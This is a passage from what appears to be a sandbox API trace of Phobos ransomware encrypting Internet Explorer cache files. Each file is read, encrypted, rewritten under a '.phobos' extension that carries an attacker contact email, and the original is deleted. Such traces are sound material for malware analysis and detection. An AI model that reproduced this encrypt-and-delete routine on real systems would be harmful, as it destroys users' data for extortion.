lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x220, lpOverlapped=0x0) returned 1 [0177.152] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0177.152] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.152] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.152] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.152] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.158] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.158] CloseHandle (hObject=0x158) returned 1 [0177.158] CloseHandle (hObject=0x194) returned 1 [0177.158] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png")) returned 1 [0177.174] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.273] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=995) returned 1 [0177.273] CloseHandle (hObject=0x17c) returned 1 [0177.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm")) returned 0x2020 [0177.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.273] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.274] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.275] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.275] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.275] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e3, lpOverlapped=0x0) returned 1 [0177.336] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f0) returned 1 [0177.336] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3f0, lpOverlapped=0x0) returned 1 [0177.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.336] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.336] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0177.336] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.336] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0177.337] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.337] CloseHandle (hObject=0x17c) returned 1 [0177.337] CloseHandle (hObject=0x15c) returned 1 [0177.337] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm")) returned 1 [0177.338] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.338] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7202) returned 1 [0177.338] CloseHandle (hObject=0x15c) returned 1 [0177.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg")) returned 0x2020 [0177.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.339] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.339] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.339] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.339] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.339] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1c22, lpOverlapped=0x0) returned 1 [0177.356] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c30, dwBufLen=0x1c30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c30) returned 1 [0177.357] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c30, lpOverlapped=0x0) returned 1 [0177.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.358] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.358] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.358] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.358] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.358] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.358] CloseHandle (hObject=0x15c) returned 1 [0177.358] CloseHandle (hObject=0x17c) returned 1 [0177.358] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg")) returned 1 [0177.359] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.360] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=564) returned 1 [0177.360] CloseHandle (hObject=0x17c) returned 1 [0177.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png")) returned 0x2020 [0177.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.360] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.360] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.361] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.361] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x234, lpOverlapped=0x0) returned 1 [0177.367] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240, dwBufLen=0x240 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240) returned 1 [0177.367] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x240, lpOverlapped=0x0) returned 1 [0177.368] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.368] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.368] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.368] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.368] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.368] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.368] CloseHandle (hObject=0x17c) returned 1 [0177.368] CloseHandle (hObject=0x15c) returned 1 [0177.368] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png")) returned 1 [0177.369] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.370] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1993) returned 1 [0177.370] CloseHandle (hObject=0x15c) returned 1 [0177.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg")) returned 0x2020 [0177.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.370] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.370] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.371] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.371] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7c9, lpOverlapped=0x0) returned 1 [0177.378] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7d0, dwBufLen=0x7d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7d0) returned 1 [0177.378] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7d0, lpOverlapped=0x0) returned 1 [0177.379] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.379] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.379] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.379] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.379] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.379] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.379] CloseHandle (hObject=0x15c) returned 1 [0177.379] CloseHandle (hObject=0x17c) returned 1 [0177.379] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg")) returned 1 [0177.380] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.394] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7961) returned 1 [0177.394] CloseHandle (hObject=0x17c) returned 1 [0177.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg")) returned 0x2020 [0177.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 